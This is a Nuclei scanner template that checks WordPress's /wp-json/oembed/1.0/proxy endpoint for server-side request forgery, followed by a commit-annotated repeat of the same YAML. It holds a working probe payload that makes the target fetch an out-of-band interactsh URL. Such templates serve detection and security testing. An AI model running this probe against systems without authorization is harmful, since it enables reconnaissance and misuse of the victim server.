nuclei-templates/vulnerabilities/wordpress/wordpress-ssrf-oembed.yaml

id: wordpress-ssrf-oembed

info:
  name: Wordpress : /wp-json/oembed/1.0/proxy - SSRF
  author: dhiyaneshDk
  severity: medium 
  reference:
    - https://book.hacktricks.xyz/pentesting/pentesting-web/wordpress
    - https://github.com/incogbyte/quickpress/blob/master/core/req.go
  tags: wordpress,ssrf,oast

requests:
  - method: GET
    path:
      - "{{BaseURL}}/wp-json/oembed/1.0/proxy?url=http://{{interactsh-url}}/"
    matchers:
      - type: word
        part: interactsh_protocol
        words:
          - "http"
Create wordpress-ssrf-oembed.yaml 2021-12-16 08:18:34 +00:00			`id: wordpress-ssrf-oembed`

			`info:`
			`name: Wordpress : /wp-json/oembed/1.0/proxy - SSRF`
			`author: dhiyaneshDk`
			`severity: medium`
			`reference:`
			`- https://book.hacktricks.xyz/pentesting/pentesting-web/wordpress`
			`- https://github.com/incogbyte/quickpress/blob/master/core/req.go`
			`tags: wordpress,ssrf,oast`

			`requests:`
			`- method: GET`
			`path:`
Update wordpress-ssrf-oembed.yaml 2021-12-16 08:51:53 +00:00			`- "{{BaseURL}}/wp-json/oembed/1.0/proxy?url=http://{{interactsh-url}}/"`
Create wordpress-ssrf-oembed.yaml 2021-12-16 08:18:34 +00:00			`matchers:`
			`- type: word`
Update wordpress-ssrf-oembed.yaml 2021-12-16 08:51:53 +00:00			`part: interactsh_protocol`
Create wordpress-ssrf-oembed.yaml 2021-12-16 08:18:34 +00:00			`words:`
			`- "http"`